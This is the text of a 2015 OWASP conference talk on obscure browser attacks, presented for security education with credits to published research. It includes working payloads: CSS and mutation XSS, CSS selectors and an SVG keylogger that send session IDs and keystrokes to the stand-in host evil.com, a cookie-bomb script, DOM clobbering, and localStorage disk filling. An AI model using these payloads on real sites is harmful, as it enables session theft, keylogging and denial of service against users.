I Didn't See That Coming

OWASP Cluj-Napoca 29th January 2015

Who am I?

CSS
HTML
SCRIPTS

Cascading Style Sheets 

 Style sheet language used for describing the look and formatting of a document written in a markup language.

Facts

18 years old; 

Invented by Opera CTO Håkon Wium Lie;

It was a competitor to Netscape's JSSS;

Originally it was a "Style Sheet Language".

Problems

CSS Expressions (IE 5-10)
 

Data Leakage via Attribute-Selector

Mutation XSS

And ++

<p style=color:expression(alert(1))>
IN: <p style="font-family":'\22\3bx:expression(alert(1))/*'">
OUT: <P style="FONT-FAMILY: ; x: expression(alert(1))"></P>

SESSIONS OWNAGE

CSS

@-moz   -  Gecko-engine-specific rule

document   -  Rule that restricts the style rules contained within it based on the URL of the document.
regexp("") {}  -  
Regular expressions are patterns used to match character combinations in strings.

ul li:nth-child(n){}  -  Selector matches every element that is the nth child, regardless of type, of its parent.

background:url()  -  Load Background file from other source.

 

Attack

@-moz-document regexp(".*PHPSESSID=0.*"){
   ul li:nth-child(1){background:url(//evil.com/?character:0#position:0)}
 }

@-moz-document regexp(".*PHPSESSID=.0.*"){
   ul li:nth-child(2){background:url(//evil.com/?character:0#position:1)}
 }

Brute-force  0-9 | a-z | A-Z

http://html5sec.org/cssession/?PHPSESSID=SESSION_ID

For more information check Mario Heiderich research.

http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf

http://www.slideshare.net/x00mario/stealing-the-pie

KEYLOGGER

SVG

Scalable Vector Graphics is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation. 

set   -  The ‘set’ element provides a simple means of just setting the value of an attribute for a specified duration.
            attributeName  -  link:href.
            to   -  Specifies the value for the attribute during the duration of the ‘set’ element.

accessKey()   -  Describes a key press event and an optional offset that will begin the element.

SVG

Attack

<svg height="0px">
    <image xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="none">
        <set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" />
           ...
        <set attributeName="xlink:href" begin="accessKey(z)" to="//evil.com/?z" />
    </image>
</svg>

Map: a-z  |  A-Z  |  0-9

http://html5sec.org/keylogger/

For more information check Mario Heiderich research.

http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf

http://www.slideshare.net/x00mario/stealing-the-pie

CONDITIONAL

COMPILATION

What is it?

Conditional compilation lets you dictate to IE whether to compile certain parts of your JScript or JavaScript code depending on predefined and user defined conditions.

Supported in Internet Explorer (4-10); 

Lost...

<script>
/*@cc_on @*/
/*@
    document.write("JavaScript version: " + @_jscript_version + ".");
    document.write("<br />");
    @if (@_win32)
        document.write("Running on the 32-bit version of Windows.");
    @elif (@_win16)
        document.write("Running on the 16-bit version of Windows.");
    @else
        document.write("Running on a different operating system.");
    @end
@*/
</script>

But as always

<script>@set@a=1alert(1)</script>

Local Page

COOKIE BOMB

let's break the Internet!

How? Cookies.

What? Your browser will keep sending those cookies and servers will reject the requests.

Why? Because Cookie header will be very long.

Result: The entire Internet will look down to you. 

Some technical info

Max cookie size: 4k;

Max number of cookies: No idea but enough;

What do I need? JS Execution on a Domain including Subdomains 

Attack


var pollution = Array(4000).join('a');
for(var i=1;i<99;i++){
    document.cookie='bomb'+i+'='+pollution+';'
  }

Any Site

For more information check Egor Homakov research.

http://homakov.blogspot.ro/2014/01/cookie-bomb-or-lets-break-internet.html

PAGE DOS & ++

What are you talking about? User-supplied HTML elements with name attributes matching DOM variables would prevent JavaScript from accessing those variables.

Tell me more... An element like <img src='something.png' name='querySelector'> would cause JavaScript references to document.querySelector to return the image element rather than the querySelector function.

JavaScript namespace clobbering

Examples

<img src="#" name="user-content-top">
<img src="#" name="user-content-window">
<img src="#" name="user-content-location">
<img src="#" name="user-content-document">
<img src="#" name="user-content-history">
<img src="#" name="user-content-screen">
<img src="#" name="user-content-postMessage">
<img src="#" name="user-content-atob">
<img src="#" name="user-content-onload">
<img src="#" name="user-content-onkeyup">
<img src="#" name="user-content-onkeypress">
<img src="#" name="user-content-onkeydown">
<img src="#" name="user-content-images">
<img src="#" name="user-content-head">
<img src="#" name="user-content-body">
<img src="#" name="user-content-cookie">
<img src="#" name="user-content-URL">
<img src="#" name="user-content-domain">
<img src="#" name="user-content-referrer">
<img src="#" name="user-content-title">

For more information check Mathias Karlsson work.

https://bounty.github.com/researchers/avlidienbrunn.html

Remember DOM Clobbering?

<script>
    if(top!=self){
        top.location=self.location
    }
</script>
<form name=self location="javascript:alert(1)"></form>
<script>
    if(top!=self){
        top.location=self.location
    }
</script>

PATCHED!

http://www.thespanner.co.uk/2013/05/16/dom-clobbering/

For more information check Gareth Heyes research.

FILL DISK

Driving people crazy... 

Why?  For Fun And/Or Profit.

How? HTML5 localStorage.

What? The localStorage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB).

But are there limits?

Yeah..

         5 MB per origin in Google Chrome, Mozilla Firefox, and Opera;

        10 MB per storage area in Internet Explorer;

        25MB per origin on BlackBerry 10 devices.

But...

"Attacking..."

Subdomains are your friends:

             1.domain.com; 2.domain.com; ...; N.domain.com.

http://www.filldisk.com/

It's Over!

Credits

Images by sheeps.it

Presentation:
             by Renato Rodrigues | @simps0n | pathonproject.com

Content:

Made with Slides.com